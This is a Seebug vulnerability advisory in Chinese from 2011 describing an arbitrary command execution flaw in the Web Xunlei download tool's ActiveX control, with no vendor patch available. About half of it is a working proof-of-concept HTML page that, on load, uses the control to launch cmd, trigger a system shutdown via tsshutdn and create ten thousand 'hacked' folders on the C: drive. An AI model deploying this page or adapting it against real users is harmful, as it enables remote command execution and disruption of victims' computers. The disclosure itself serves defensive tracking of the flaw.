web迅雷允许执行任意系统命令漏洞

2011-05-01T00:00:00
ID SSV:20505
Type seebug
Reporter Root
Modified 2011-05-01T00:00:00

Description

Web迅雷是一款基于多资源超线程技术的下载工具,它继承了迅雷5的操作方便、高速下载的特点外,同时使用全网页化的操作界面,更符合互联网用户使用习惯,是国内第一款网页上的下载工具。

Web迅雷在实现上存在设计漏洞,程序会接收攻击者提供的恶意参数直接执行,远程攻击者可利用此漏洞控制用户受影响系统。

XunLei web迅雷 厂商补丁:

XunLei

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://dl.xunlei.com/wxl.html

                                        
                                            
                                                <html>
<head>
<title>迅雷执行任意系统命令</title>
</head>
<body>
运行迅雷加载项。
<script>
/**
*by kxlzx
*/
server = new ActiveXObject("ThunderServer.WebThunder.1");
if(server==null)
{
    alert("没装迅雷,请安装web迅雷");
    window.location.href="http://dl.xunlei.com/wxl.html";
}else{
    server.OpenDirectory("cmd");
    alert("要我帮你关机么?");
    alert("哎呀呀!悲剧啊!你怎么不小心点了确定了?");
    server.OpenDirectory("tsshutdn");
    //创建无数文件夹
    j = 10000;
    for(i=0;i<j;i++){
        server.CreatePathTree("c:\\hacked by kxlzx "+i);
    }
    setTimeout("alert('还愣着?赶快保存啊!')",50000);
}

</script>
</body>
</html>